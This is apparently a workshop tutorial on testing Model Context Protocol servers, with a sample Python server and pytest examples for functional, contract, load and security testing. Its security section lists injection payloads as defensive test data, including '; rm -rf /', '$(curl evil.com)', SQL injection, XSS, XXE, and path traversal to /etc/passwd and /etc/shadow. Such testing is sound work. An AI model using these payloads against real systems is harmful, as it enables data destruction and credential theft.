This comprehensive tutorial is designed for QA Engineers and SDETswho want to master testing the Model Context Protocol (MCP). Whether you're transitioning from REST API testing or expanding your skillset into AI infrastructure, this workshop provides hands-on, production-grade knowledge.
This workshop takes approximately 3-4 hours to complete. Each module builds on the previous one, so we recommend following the sequence.
| Module | Topic | Duration |
|---|---|---|
| Module 1 | Foundations of MCP | 45 min |
| Module 2 | QA & SDET Test Strategy | 60 min |
| Module 3 | Hands-On Project | 75 min |
| Module 4 | Advanced SDET Architecture | 30 min |
| Assessment | Final Quiz | 20 min |
This tutorial emphasizes hands-on practice. You'll find interactive exercises, real code examples, and practical scenarios throughout. Don't just readβexperiment with the code and concepts !
Model Context Protocol (MCP)is an open protocol that standardizes how applications provide context to Large Language Models (LLMs). It enables AI applications to securely connect to diverse data sources and tools through a unified interface, solving the fragmentation problem in AI tool integration.
Before MCP, every AI application built custom integrations for each tool, database, or API:
β THE OLD WAY: Claude App β Custom Slack Integration Claude App β Custom GitHub Integration Claude App β Custom Database Integration ChatGPT β Different Custom Integrations (no reuse)
Problems this created:
β WITH MCP: Any AI App β MCP Protocol β MCP Server (Slack) Any AI App β MCP Protocol β MCP Server (GitHub) Any AI App β MCP Protocol β MCP Server (Database)
MCP solves the fundamental scaling problem in AI tool integration:
This architectural shift means you're no longer testing just API endpointsβyou' re testing a bidirectional protocolwith dynamic capability negotiation, persistent sessions, and stateful interactions.
| Aspect | REST/GraphQL | MCP |
|---|---|---|
| Purpose | General API communication | LLM-context delivery |
| Discovery | Static OpenAPI/Schema | Dynamic capability negotiation |
| Session Model | Stateless (REST) | Persistent bidirectional session |
| Tool Schema | Not standardized | JSON Schema for tools |
| Transport | HTTP only | stdio, HTTP+SSE, WebSocket |
| Context Flow | Request β Response | Resources+Tools+Prompts |
MCP Server connects to: βββ Confluence (documentation) βββ JIRA (project tracking) βββ Slack (team communication) βββ Git (code repositories) AI can query across all systems simultaneously. QA Challenge:Validate cross-system data consistency
MCP Server exposes tools for: βββ Deploy application βββ Rollback deployment βββ Check logs βββ Monitor metrics AI orchestrates the entire deployment pipeline. QA Challenge:Test rollback scenarios and error handling
MCP Server provides access to: βββ CRM data (customer history) βββ Ticketing API (support tickets) βββ Knowledge base (solutions) AI resolves tickets with full context. QA Challenge:Validate PII handling and security boundaries
Question:Think about your current testing work. What's one API or system you test that could benefit from MCP standardization?
Consider:
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ β β β βββββββββββββββ βββββββββββββββ β β β β β β β β β AI Client β βββββββββΊ β MCP Server β β β β (Claude) β MCP β β β β β β Protocol β β β β βββββββββββββββ ββββββββ¬βββββββ β β β β β βββββββββββββββββββββββββββΌββββββββββββββββββ β β β β β β β βββββΌββββ βββββΌββββ βββββΌββββ β β β Tools β βResourcesβ βPromptsβ β β β β β β β β β β ββ’ calc β ββ’ filesβ ββ’ expl β β β ββ’ API β ββ’ DB β ββ’ fix β β β βββββββββ βββββββββ βββββββββ β β β βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
MCP supports three transport mechanisms:
| Transport | Use Case | Testing Focus |
|---|---|---|
| stdio | Local processes | Process lifecycle, I/O streams |
| HTTP+SSE | Remote servers | Connection handling, retries |
| WebSocket | Real-time bidirectional | Connection stability, reconnection |
Step 1: Connection Initialization Client β Server: Initialize request Server β Client: Server capabilities Step 2: Capability Discovery Client β Server: List available tools Server β Client: Tool schemas Step 3: Tool Invocation Client β Server: Call tool with parameters Server: Execute tool logic Server β Client: Return result Step 4: Error Handling (if needed) Server β Client: Error response with details
{
"jsonrpc": "2.0",
"id": 1,
"method": "initialize",
"params": {
"protocolVersion": "2024-11-05",
"capabilities": {
"roots": {
"listChanged": true
}
,
"sampling": {}
}
,
"clientInfo": {
"name": "TestClient",
"version": "1.0.0"
}
}
}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"protocolVersion": "2024-11-05",
"capabilities": {
"logging": {}
,
"prompts": {
"listChanged": true
}
,
"resources": {
"subscribe": true,
"listChanged": true
}
,
"tools": {
"listChanged": true
}
}
,
"serverInfo": {
"name": "ExampleServer",
"version": "1.0.0"
}
}
}
The initialization handshake is critical. Your tests must validate:
Scenario:An MCP server connects to three different databases: PostgreSQL, MongoDB, and Redis.
Questions:
Think About:Connection pooling, resource cleanup, graceful degradation
MCP defines three primary primitives that servers can expose:
Definition:Executable functions that the AI can call to perform actions or retrieve computed data.
{
"name": "calculate_discount",
"description": "Calculate discounted price based on original price and discount percentage",
"inputSchema": {
"type": "object",
"properties": {
"original_price": {
"type": "number",
"description": "Original price before discount"
}
,
"discount_percent": {
"type": "number",
"description": "Discount percentage (0-100)",
"minimum": 0,
"maximum": 100
}
}
,
"required": ["original_price",
"discount_percent"]
}
}
Testing Focus:
Definition:Data sources that provide context to the AI, such as files, database queries, or API responses.
{
"uri": "file:///docs/api-reference.md",
"name": "API Reference Documentation",
"description": "Complete API documentation for the product",
"mimeType": "text/markdown"
}
Testing Focus:
Definition:Reusable prompt templates that guide AI interactions.
{
"name": "code_review",
"description": "Review code for bugs and improvements",
"arguments": [ {
"name": "code",
"description": "Code to review",
"required": true
}
,
{
"name": "language",
"description": "Programming language",
"required": true
}
]
}
{
"jsonrpc": "2.0",
"id": 2,
"method": "tools/call",
"params": {
"name": "calculate_discount",
"arguments": {
"original_price": 100.00,
"discount_percent": 20
}
}
}
{
"jsonrpc": "2.0",
"id": 2,
"result": {
"content": [ {
"type": "text",
"text": "Discounted price: $80.00 (20% off $100.00)"
}
]
}
}
{
"jsonrpc": "2.0",
"id": 2,
"error": {
"code": -32602,
"message": "Invalid params",
"data": {
"details": "discount_percent must be between 0 and 100, got 150"
}
}
}
| Error Code | Meaning | Test Scenario |
|---|---|---|
| -32700 | Parse error | Send malformed JSON |
| -32600 | Invalid request | Missing required fields |
| -32601 | Method not found | Call non-existent tool |
| -32602 | Invalid params | Wrong parameter types |
| -32603 | Internal error | Server crash simulation |
Error codes must be consistent and predictable. Your test suite should verify that the server returns the correct error code for each failure scenario. Don't just check that an error occurredβvalidate the specific error code and message.
1. Boundary Values- Maximum string length - Minimum/maximum numbers - Empty arrays - Null values 2. Type Coercion- String "100" vs number 100 - Boolean true vs string "true"
- undefined vs null 3. Unicode and Special Characters- Emoji in tool names - Non-ASCII characters - Control characters 4. Concurrent Requests- Multiple tool calls simultaneously - Race conditions in stateful operations - Resource locking 5. Timeout Scenarios- Long-running tool execution - Network delays - Database query timeouts
Consider this tool schema:
{
"name": "send_email",
"inputSchema": {
"type": "object",
"properties": {
"to": {
"type": "string", "format": "email"
}
,
"subject": {
"type": "string", "maxLength": 100
}
,
"body": {
"type": "string"
}
,
"attachments": {
"type": "array",
"items": {
"type": "string"
}
,
"maxItems": 5
}
}
,
"required": ["to",
"subject",
"body"]
}
}
Design 5 test cases:
Hint:Think about email format, length limits, required fields, and array constraints.
Testing an MCP server requires a multi-layered approach. Unlike REST APIs where you primarily test endpoints, MCP testing involves protocol compliance, capability negotiation, and stateful interactions.
What to verify:
Test Case: Duplicate Tool Names Given: MCP server with two tools named "calculate"
When: Server initializes Then: Should reject with error OR rename with suffix Expected: Clear error message indicating duplicate tool name
Critical validations:
| Validation Type | Test Approach | Example |
|---|---|---|
| Type Checking | Pass wrong types | String instead of number |
| Required Fields | Omit required params | Missing "email" field |
| Format Validation | Invalid formats | "not-an-email" for email field |
| Range Validation | Boundary testing | 101 for 0-100 range |
| Pattern Matching | Regex violations | "ABC" for "[0-9]+" pattern |
During initialization, servers declare their capabilities. Test that:
{
"capabilities": {
"logging": {}
,
// Can send logs to client
"prompts": {
// Can provide prompts
"listChanged": true // Notifies on prompt list changes
}
,
"resources": {
// Can provide resources
"subscribe": true, // Supports resource subscriptions
"listChanged": true // Notifies on resource list changes
}
,
"tools": {
// Can provide tools
"listChanged": true // Notifies on tool list changes
}
}
}
Test scenarios:
The core functional testing area:
For each tool,
test: β Happy Path- Valid inputs - Expected outputs - Correct data types in response β Edge Cases- Boundary values (min/max) - Empty inputs - Null/undefined values - Special characters β Error Conditions- Invalid inputs - Missing required fields - Type mismatches - Business logic violations β State Management- Does tool modify state? - Can it be called repeatedly? - Are state changes idempotent?
Good error handling is predictable, informative, and consistent. Every error should return:
Test how the server handles long-running operations:
Scenario 1: Tool execution exceeds timeout Given: Tool takes 60s to execute When: Client timeout is 30s Then: Client receives timeout error And: Server should cancel/cleanup the operation Scenario 2: Network timeout Given: Client-server connection is unstable When: Request is sent Then: Implement retry logic OR fail gracefully Scenario 3: Database query timeout Given: Tool queries slow database When: Query exceeds timeout Then: Return specific timeout error And: Don't crash the server
MCP servers must handle multiple simultaneous requests:
| Test Type | Scenario | Expected Behavior |
|---|---|---|
| Parallel Tools | Call 10 different tools simultaneously | All succeed independently |
| Same Tool | Call same tool 10 times concurrently | All execute correctly, no race conditions |
| Resource Lock | Two tools accessing same database | Proper locking, no deadlocks |
| State Modification | Concurrent writes to shared state | Consistent final state |
Questions to answer through testing:
As servers evolve, test that changes don't break existing clients:
Version 1.0: {
"name": "get_user",
"params": {
"user_id": "string"
}
}
Version 2.0: {
"name": "get_user",
"params": {
"user_id": "string",
"include_metadata": "boolean" // NEW optional field
}
}
Test:V1 client calling V2 server should still work
Scenario:You're testing an MCP server that exposes a "weather_forecast" tool.
{
"name": "weather_forecast",
"inputSchema": {
"type": "object",
"properties": {
"location": {
"type": "string"
}
,
"days": {
"type": "integer", "minimum": 1, "maximum": 7
}
,
"units": {
"type": "string", "enum": ["celsius", "fahrenheit"]
}
}
,
"required": ["location",
"days"]
}
}
Your Task:List 10 specific test cases covering:
Functional testing for MCP servers follows a structured approach that goes beyond simple API testing. You're validating protocol compliance, tool behavior, and integration logic.
| Field | Description | Example |
|---|---|---|
| Test ID | Unique identifier | MCP-TC-001 |
| Category | Type of test | Tool Execution |
| Priority | Critical/High/Medium/Low | Critical |
| Preconditions | Setup requirements | Server initialized |
| Test Steps | Detailed actions | 1. Call tool 2. Verify response |
| Test Data | Input parameters | { "price": 100, "discount": 20 } |
| Expected Result | What should happen | Returns discounted price $80 |
| Actual Result | What actually happened | Pass/Fail with details |
| Test ID | Scenario | Input | Expected Output | Type |
|---|---|---|---|---|
| TC-001 | Valid calculation | price: 100, discount: 20 | 80.00 | Positive |
| TC-002 | Zero discount | price: 100, discount: 0 | 100.00 | Boundary |
| TC-003 | 100% discount | price: 100, discount: 100 | 0.00 | Boundary |
| TC-004 | Negative price | price: -50, discount: 20 | Error: Invalid price | Negative |
| TC-005 | Discount>100 | price: 100, discount: 150 | Error: Invalid discount | Negative |
| TC-006 | Missing field | price: 100 | Error: Missing discount | Negative |
| TC-007 | Wrong type | price: "hundred", discount: 20 | Error: Invalid type | Negative |
| TC-008 | Decimal precision | price: 99.99, discount: 33.33 | 66.66 | Edge Case |
| TC-009 | Very large number | price: 999999999, discount: 50 | 499999999.50 | Edge Case |
| TC-010 | Extra fields | price: 100, discount: 20, extra: "test" | 80.00 (ignore extra) | Edge Case |
For Every Tool Test:β‘ Response Structure β Correct JSON-RPC format β Proper ID matching request β Result or error field (not both) β‘ Data Validation β Correct data types β Required fields present β Enum values valid β Format specifications met β‘ Error Handling β Appropriate error code β Clear error message β Error details provided β No stack traces to client β‘ Performance β Response time < threshold β No memory leaks β Proper resource cleanup β‘ Side Effects β State changes as expected β Idempotency maintained β No unintended modifications
# Example: Pytest test case def test_calculate_discount_valid_input(): "" "Test discount calculation with valid inputs" ""
request= {
"jsonrpc": "2.0",
"id": 1,
"method": "tools/call",
"params": {
"name": "calculate_discount",
"arguments": {
"original_price": 100.00,
"discount_percent": 20
}
}
}
response=client.send(request) assert response["jsonrpc"]=="2.0"
assert response["id"]==1 assert "result" in response assert response["result"]["content"][0]["text"]=="Discounted price: $80.00"
def test_calculate_discount_invalid_discount(): "" "Test that discount > 100 returns error" ""
request= {
"jsonrpc": "2.0",
"id": 2,
"method": "tools/call",
"params": {
"name": "calculate_discount",
"arguments": {
"original_price": 100.00,
"discount_percent": 150 # Invalid !
}
}
}
response=client.send(request) assert "error" in response assert response["error"]["code"]==-32602 # Invalid params assert "must be between 0 and 100" in response["error"]["message"]
import jsonschema def test_tool_schema_compliance(): "" "Verify tool schema is valid JSON Schema" ""
tool_schema= {
"name": "send_notification",
"inputSchema": {
"type": "object",
"properties": {
"message": {
"type": "string", "maxLength": 500
}
,
"priority": {
"type": "string", "enum": ["low", "medium", "high"]
}
,
"recipients": {
"type": "array",
"items": {
"type": "string", "format": "email"
}
,
"minItems": 1,
"maxItems": 10
}
}
,
"required": ["message",
"recipients"]
}
}
# Validate the schema itself is valid JSON Schema try: jsonschema.Draft7Validator.check_schema(tool_schema["inputSchema"]) except jsonschema.SchemaError as e: pytest.fail(f"Invalid schema: {e}") # Test valid input valid_input= {
"message": "Test notification",
"priority": "high",
"recipients": ["[email protected]"]
}
jsonschema.validate(valid_input, tool_schema["inputSchema"]) # Test invalid input invalid_input= {
"message": "x" * 501, # Exceeds maxLength "recipients": [] # Violates minItems
}
with pytest.raises(jsonschema.ValidationError): jsonschema.validate(invalid_input, tool_schema["inputSchema"])
Tool Specification:
{
"name": "create_user",
"inputSchema": {
"type": "object",
"properties": {
"username": {
"type": "string",
"pattern": "^[a-z0-9_]{3,20}$"
}
,
"email": {
"type": "string",
"format": "email"
}
,
"age": {
"type": "integer",
"minimum": 18,
"maximum": 120
}
,
"role": {
"type": "string",
"enum": ["user", "admin", "moderator"]
}
}
,
"required": ["username",
"email"]
}
}
Task:Create a complete test matrix with:
Think about:Pattern matching, email validation, integer boundaries, enum values, required fields
Contract testing verifies that the MCP server adheres to its published interface contract. Unlike functional testing (which tests behavior), contract testing ensures the API structure, data types, and protocol compliance remain consistent across versions.
Contract tests answer: "Does the server do what it promised in its schema?"
import jsonschema import pytest def test_tool_list_contract(): "" "Verify tools/list response matches expected contract" ""
# Expected contract for tools/list response expected_schema= {
"type": "object",
"properties": {
"jsonrpc": {
"const": "2.0"
}
,
"id": {
"type": ["number", "string"]
}
,
"result": {
"type": "object",
"properties": {
"tools": {
"type": "array",
"items": {
"type": "object",
"properties": {
"name": {
"type": "string"
}
,
"description": {
"type": "string"
}
,
"inputSchema": {
"type": "object"
}
}
,
"required": ["name",
"inputSchema"]
}
}
}
,
"required": ["tools"]
}
}
,
"required": ["jsonrpc",
"id",
"result"]
}
# Make actual request response=client.list_tools() # Validate against contract try: jsonschema.validate(response, expected_schema) except jsonschema.ValidationError as e: pytest.fail(f"Contract violation: {e.message}")
Snapshot testing captures the current API response and compares future responses against it. This catches unintended changes.
import json import pytest def test_calculate_discount_response_snapshot(snapshot): "" "Ensure response structure hasn't changed" ""
request= {
"jsonrpc": "2.0",
"id": 1,
"method": "tools/call",
"params": {
"name": "calculate_discount",
"arguments": {
"original_price": 100, "discount_percent": 20
}
}
}
response=client.send(request) # Remove dynamic fields for comparison response_snapshot= {
"jsonrpc": response["jsonrpc"],
"id": response["id"],
"result": {
"content": response["result"]["content"]
}
}
# Compare with stored snapshot snapshot.assert_match(json.dumps(response_snapshot, indent=2), "discount_response.json")
| Change Type | Breaking? | Contract Test Strategy |
|---|---|---|
| Add new tool | β No | Verify tool list grows |
| Remove existing tool | β Yes | Block in CI/CD |
| Add optional parameter | β No | Verify backward compatibility |
| Add required parameter | β Yes | Block in CI/CD |
| Change parameter type | β Yes | Block in CI/CD |
| Change error code | β Yes | Version bump required |
In consumer-driven testing, clients define their expectations (contracts), and the server must satisfy them.
# consumer_contract.yaml interactions: - description: Calculate discount for valid input request: method: tools/call params: name: calculate_discount arguments: original_price: 100 discount_percent: 20 response: status: success body: matchingRules: "$.result.content[0].type": {
match: "type", value: "string"
}
"$.result.content[0].text": {
match: "regex",
regex: "Discounted price: \\$\\d+\\.\\d{2}"
}
Scenario:You're testing a "currency_converter" tool.
{
"name": "currency_converter",
"inputSchema": {
"type": "object",
"properties": {
"amount": {
"type": "number", "minimum": 0
}
,
"from_currency": {
"type": "string",
"pattern": "^[A-Z]{3}$"
}
,
"to_currency": {
"type": "string",
"pattern": "^[A-Z]{3}$"
}
}
,
"required": ["amount",
"from_currency",
"to_currency"]
}
}
Task:Write a JSON Schema that validates the response structure for this tool. Consider:
Performance testing validates that your MCP server can handle expected load while maintaining acceptable response times and resource usage.
| Metric | Description | Target |
|---|---|---|
| Response Time | Time from request to response | < 100ms (p95) |
| Throughput | Requests per second | 100+RPS |
| Latency (p99) | 99th percentile response time | < 500ms |
| Error Rate | Failed requests percentage | < 0.1% |
| CPU Usage | Server CPU consumption | < 70% |
| Memory Usage | RAM consumption | No leaks |
Test how many requests the server can handle per second:
import asyncio import time from concurrent.futures import ThreadPoolExecutor async def load_test_throughput(): "" "Test server throughput with concurrent requests" ""
num_requests=1000 concurrent_workers=50 start_time=time.time() async def make_request(): request= {
"jsonrpc": "2.0",
"id": 1,
"method": "tools/call",
"params": {
"name": "calculate_discount",
"arguments": {
"original_price": 100, "discount_percent": 20
}
}
}
return await client.send_async(request) # Execute concurrent requests tasks=[make_request() for _ in range(num_requests)] results=await asyncio.gather(*tasks, return_exceptions=True) end_time=time.time() duration=end_time - start_time # Calculate metrics successful=sum(1 for r in results if not isinstance(r, Exception)) failed=num_requests - successful throughput=num_requests / duration print(f"Total requests: {num_requests}") print(f"Successful: {successful}") print(f"Failed: {failed}") print(f"Duration: {duration:.2f}s") print(f"Throughput: {throughput:.2f} req/s") assert throughput>=100,
f"Throughput {throughput} below target"
assert failed / num_requests < 0.001,
f"Error rate too high"
import numpy as np def test_latency_percentiles(): "" "Measure response time distribution" ""
num_samples=100 response_times=[] for i in range(num_samples): start=time.time() response=client.send({
"jsonrpc": "2.0",
"id": i,
"method": "tools/call",
"params": {
"name": "calculate_discount",
"arguments": {
"original_price": 100, "discount_percent": 20
}
}
}) end=time.time() response_times.append((end - start) * 1000) # Convert to ms # Calculate percentiles p50=np.percentile(response_times, 50) p95=np.percentile(response_times, 95) p99=np.percentile(response_times, 99) print(f"Response Time Distribution:") print(f" p50 (median): {p50:.2f}ms") print(f" p95: {p95:.2f}ms") print(f" p99: {p99:.2f}ms") # Assertions assert p95 < 100,
f"p95 latency {p95}ms exceeds 100ms target"
assert p99 < 500,
f"p99 latency {p99}ms exceeds 500ms target"
def test_concurrent_same_tool(): "" "Test calling the same tool concurrently" ""
num_concurrent=20 with ThreadPoolExecutor(max_workers=num_concurrent) as executor: futures=[] for i in range(num_concurrent): future=executor.submit(client.send,
{
"jsonrpc": "2.0",
"id": i,
"method": "tools/call",
"params": {
"name": "calculate_discount",
"arguments": {
"original_price": 100 + i,
"discount_percent": 20
}
}
}) futures.append(future) # Wait for all to complete results=[f.result(timeout=10) for f in futures] # Verify all succeeded for result in results: assert "result" in result,
"Request failed"
assert "error" not in result def test_concurrent_different_tools(): "" "Test calling different tools concurrently" ""
tools=["calculate_discount",
"currency_converter",
"weather_forecast"] with ThreadPoolExecutor(max_workers=len(tools)) as executor: futures= {
executor.submit(call_tool, tool): tool for tool in tools
}
for future in futures: tool_name=futures[future] try: result=future.result(timeout=5) assert "result" in result except Exception as e: pytest.fail(f"Tool {tool_name} failed: {e}")
Test 1: Memory Leak Detection- Monitor memory usage over 1000+requests - Memory should remain stable - No continuous growth pattern Test 2: Connection Pool Exhaustion- Open 100+concurrent connections - Verify server handles gracefully - Check for connection timeout errors Test 3: Large Payload Handling- Send tool calls with 1MB+parameters - Verify server doesn't crash - Check memory cleanup after processing Test 4: Rapid Connect/Disconnect- Connect and disconnect 50 times rapidly - Check for resource leaks - Verify cleanup happens correctly
Scenario:Your MCP server will be used by 100 concurrent AI agents, each making 10 tool calls per minute.
Calculate:
Design:Write pseudocode for a load test that validates this scenario.
Security testing is critical for MCP servers because they often have access to sensitive data, APIs, and can execute arbitrary operations. As a QA engineer, you must validate security boundaries.
MCP servers are privileged components in AI systems. A compromised server can leak data, corrupt systems, or enable unauthorized actions. Security testing is not optional.
| Threat | Attack Vector | Test Strategy |
|---|---|---|
| Prompt Injection | Malicious input in tool parameters | Inject commands in strings |
| Schema Poisoning | Manipulated tool schemas | Send malformed schemas |
| Data Exfiltration | Unauthorized data access | Test access controls |
| Privilege Escalation | Bypass authorization checks | Attempt restricted operations |
| DoS/Resource Exhaustion | Overwhelming requests | Send massive payloads |
Test if malicious input can manipulate server behavior:
def test_prompt_injection_attempts(): "" "Test various prompt injection techniques" ""
injection_payloads=[ # Command injection "; rm -rf /",
"$(curl evil.com)",
# SQL injection patterns "'; DROP TABLE users; --",
"1' OR '1'='1",
# Path traversal "../../../etc/passwd",
"....//....//....//etc/passwd",
# Script injection "<script>alert('XSS')</script>",
"javascript:alert(1)",
# Template injection "{{7*7}}",
"${7*7}",
# LDAP injection "*)(uid=*))(|(uid=*",
] for payload in injection_payloads: request= {
"jsonrpc": "2.0",
"id": 1,
"method": "tools/call",
"params": {
"name": "search_files",
"arguments": {
"query": payload
}
}
}
response=client.send(request) # Server should handle safely - either sanitize or reject if "result" in response: # Check result doesn't contain executed payload
result_text=str(response["result"]) assert "etc/passwd" not in result_text assert "DROP TABLE" not in result_text elif "error" in response: # Error is acceptable - server rejected dangerous input pass else: pytest.fail("Unexpected response format")
def test_malformed_payloads(): "" "Test server's resilience to malformed requests" ""
malformed_requests=[ # Missing required fields {
"jsonrpc": "2.0", "method": "tools/call"
}
,
# Wrong JSON-RPC version {
"jsonrpc": "1.0",
"id": 1,
"method": "tools/call",
"params": {}
}
,
# Invalid method name {
"jsonrpc": "2.0",
"id": 1,
"method": "/../../../etc/passwd",
"params": {}
}
,
# Oversized payload {
"jsonrpc": "2.0",
"id": 1,
"method": "tools/call",
"params": {
"name": "test",
"arguments": {
"data": "X" * 10_000_000
}
}
}
,
# Deeply nested structure {
"jsonrpc": "2.0",
"id": 1,
"method": "tools/call",
"params": {
"a": {
"b": {
"c": {
"d": {
"e": "..."
}
}
}
}
}
}
* 1000,
# NULL bytes {
"jsonrpc": "2.0",
"id": 1,
"method": "tools\x00/call",
"params": {}
}
,
] for malformed in malformed_requests: try: response=client.send(malformed) # Should return proper error,
not crash assert "error" in response assert response["error"]["code"] in [-32700,
-32600,
-32602] except Exception as e: # Connection errors are acceptable (server protecting itself) print(f"Server rejected malformed request: {e}")
import random import string def test_input_fuzzing(): "" "Fuzz test tool inputs" ""
def generate_fuzz_string(length): "" "Generate random fuzz input" ""
chars=string.printable+"" .join(chr(i) for i in range(128, 256)) return "" .join(random.choice(chars) for _ in range(length)) fuzz_cases=[ # Random strings generate_fuzz_string(100),
generate_fuzz_string(1000),
# Unicode edge cases "\u0000" * 100,
# NULL bytes "\uffff" * 100,
# Max unicode "π₯" * 100,
# Emoji # Format strings "%s" * 100,
"%n" * 100,
# Boundary integers 2**31 - 1,
# Max int32 2**63 - 1,
# Max int64 -2**63,
# Min int64] for fuzz_input in fuzz_cases: request= {
"jsonrpc": "2.0",
"id": 1,
"method": "tools/call",
"params": {
"name": "process_text",
"arguments": {
"text": fuzz_input
}
}
}
try: response=client.send(request) # Server should handle gracefully - not crash assert "result" in response or "error" in response except Exception as e: # Network errors are acceptable if server self-protects print(f"Fuzz input caused: {e}")
Test Case: Unauthorized Tool AccessGiven: User has permission for "read_data" tool only When: User attempts to call "delete_data" tool Then: Server returns 403 Forbidden error Test Case: Token ValidationGiven: Valid authentication token required When: Request sent without token Then: Server rejects with authentication error Test Case: Expired TokenGiven: Token expired 1 hour ago When: Request sent with expired token Then: Server rejects and requests re-authentication Test Case: Token TamperingGiven: Valid token signature When: Token payload is modified Then: Server detects tampering and rejects
def test_data_sanitization(): "" "Test that server sanitizes dangerous data" ""
test_cases=[ {
"name": "HTML Injection",
"input": "<img src=x onerror=alert('XSS')>",
"should_not_contain": ["<img", "onerror", "alert"]
}
,
{
"name": "LDAP Injection",
"input": "admin*",
"should_not_contain": ["*"] # Wildcards should be escaped
}
,
{
"name": "XML Injection",
"input": "<?xml version='1.0'?><!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>",
"should_not_contain": ["<!ENTITY", "SYSTEM"]
}
] for test in test_cases: response=client.call_tool("process_input", {
"data": test["input"]
}) result_text=json.dumps(response) for dangerous_string in test["should_not_contain"]: assert dangerous_string not in result_text,
\
f"{test['name']}: Dangerous string '{dangerous_string}' not sanitized"
// 1. Path Traversal Attempt
{
"name": "read_file",
"arguments": {
"path": "../../../../etc/shadow"
}
}
// 2. Command Injection
{
"name": "execute_command",
"arguments": {
"command": "ls; cat /etc/passwd"
}
}
// 3. SQL Injection
{
"name": "search_users",
"arguments": {
"query": "' OR '1'='1' --"
}
}
// 4. Buffer Overflow Attempt
{
"name": "process_data",
"arguments": {
"data": "A" * 1000000
}
}
// 5. Resource Exhaustion
{
"name": "calculate",
"arguments": {
"iterations": 999999999999
}
}
Scenario:Your MCP server has a "database_query" tool that executes SQL queries.
Task:Design 5 security tests covering:
We're going to build and test a real MCP server with two tools:
mcp-discount-server/ βββ src/ β βββ server.py # Main MCP server β βββ tools/ β β βββ __init__.py β β βββ discount.py # Discount calculator tool β β βββ currency.py # Currency converter tool β βββ config.py # Configuration βββ tests/ β βββ __init__.py β βββ test_server.py # Server tests β βββ test_discount.py # Discount tool tests β βββ test_currency.py # Currency tool tests β βββ test_contract.py # Contract tests β βββ test_performance.py # Performance tests β βββ test_security.py # Security tests βββ requirements.txt βββ pytest.ini βββ README.md
# requirements.txt mcp>=0.1.0 pytest>=7.4.0 pytest-asyncio>=0.21.0 jsonschema>=4.19.0 aiohttp>=3.8.0 requests>=2.31.0
"" "
MCP Discount & Currency Server A sample MCP server demonstrating tool implementation and testing "" "
from mcp.server import Server from mcp.types import Tool,
TextContent import json # Import our tools from tools.discount import calculate_discount from tools.currency import convert_currency # Initialize MCP server server=Server("discount-currency-server") @server.list_tools() async def list_tools() ->list[Tool]: "" "
List all available tools This is called during capability negotiation "" "
return [ Tool(name="calculate_discount",
description="Calculate discounted price based on original price and discount percentage",
inputSchema= {
"type": "object",
"properties": {
"original_price": {
"type": "number",
"description": "Original price before discount",
"minimum": 0
}
,
"discount_percent": {
"type": "number",
"description": "Discount percentage (0-100)",
"minimum": 0,
"maximum": 100
}
}
,
"required": ["original_price", "discount_percent"]
}),
Tool(name="currency_converter",
description="Convert amount from one currency to another",
inputSchema= {
"type": "object",
"properties": {
"amount": {
"type": "number",
"description": "Amount to convert",
"minimum": 0
}
,
"from_currency": {
"type": "string",
"description": "Source currency code (e.g., USD)",
"pattern": "^[A-Z]{3}$"
}
,
"to_currency": {
"type": "string",
"description": "Target currency code (e.g., EUR)",
"pattern": "^[A-Z]{3}$"
}
}
,
"required": ["amount", "from_currency", "to_currency"]
})] @server.call_tool() async def call_tool(name: str, arguments: dict) ->list[TextContent]: "" "
Execute a tool with given arguments "" "
# Route to appropriate tool handler if name=="calculate_discount": result=calculate_discount(arguments["original_price"],
arguments["discount_percent"]) return [TextContent(type="text", text=result)] elif name=="currency_converter": result=convert_currency(arguments["amount"],
arguments["from_currency"],
arguments["to_currency"]) return [TextContent(type="text", text=result)] else: raise ValueError(f"Unknown tool: {name}") async def main(): "" "Start the MCP server" ""
from mcp.server.stdio import stdio_server async with stdio_server() as (read_stream, write_stream): await server.run(read_stream,
write_stream,
server.create_initialization_options()) if __name__=="__main__": import asyncio asyncio.run(main())
"" "
Discount calculation tool "" "
def calculate_discount(original_price: float, discount_percent: float) ->str: "" "
Calculate discounted price Args: original_price: Original price before discount discount_percent: Discount percentage (0-100) Returns: Formatted string with discounted price Raises: ValueError: If inputs are invalid "" "
# Input validation if original_price < 0: raise ValueError("Original price cannot be negative") if discount_percent < 0 or discount_percent>100: raise ValueError("Discount percent must be between 0 and 100") # Calculate discount discount_amount=original_price * (discount_percent / 100) final_price=original_price - discount_amount # Format response return (f"Discounted price: ${final_price:.2f} "
f"({discount_percent}% off ${original_price:.2f})"
)
"" "
Currency conversion tool Note: Uses mock exchange rates for demo purposes "" "
# Mock exchange rates (relative to USD) EXCHANGE_RATES= {
"USD": 1.0,
"EUR": 0.85,
"GBP": 0.73,
"JPY": 110.0,
"CAD": 1.25,
"AUD": 1.35,
}
def convert_currency(amount: float, from_currency: str, to_currency: str) ->str: "" "
Convert amount between currencies Args: amount: Amount to convert from_currency: Source currency code (e.g., "USD") to_currency: Target currency code (e.g., "EUR") Returns: Formatted string with converted amount Raises: ValueError: If currency codes are invalid "" "
# Input validation if amount < 0: raise ValueError("Amount cannot be negative") if from_currency not in EXCHANGE_RATES: raise ValueError(f"Unsupported currency: {from_currency}") if to_currency not in EXCHANGE_RATES: raise ValueError(f"Unsupported currency: {to_currency}") # Convert to USD first,
then to target currency amount_in_usd=amount / EXCHANGE_RATES[from_currency] converted_amount=amount_in_usd * EXCHANGE_RATES[to_currency] # Format response return (f"{amount:.2f} {from_currency} = "
f"{converted_amount:.2f} {to_currency}"
)
You now have a working MCP server ! In the next sections, we'll write comprehensive tests for it.
Before automating tests, let's manually verify the server works correctly.
$ cd mcp-discount-server $ python src/server.py
{
"jsonrpc": "2.0",
"id": 1,
"method": "tools/list"
}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"tools": [ {
"name": "calculate_discount",
"description": "Calculate discounted price...",
"inputSchema": {
/* schema */
}
}
,
{
"name": "currency_converter",
"description": "Convert amount...",
"inputSchema": {
/* schema */
}
}
]
}
}
// Request
{
"jsonrpc": "2.0",
"id": 2,
"method": "tools/call",
"params": {
"name": "calculate_discount",
"arguments": {
"original_price": 100.00,
"discount_percent": 20
}
}
}
// Expected Response
{
"jsonrpc": "2.0",
"id": 2,
"result": {
"content": [ {
"type": "text",
"text": "Discounted price: $80.00 (20% off $100.00)"
}
]
}
}
// Request
{
"jsonrpc": "2.0",
"id": 3,
"method": "tools/call",
"params": {
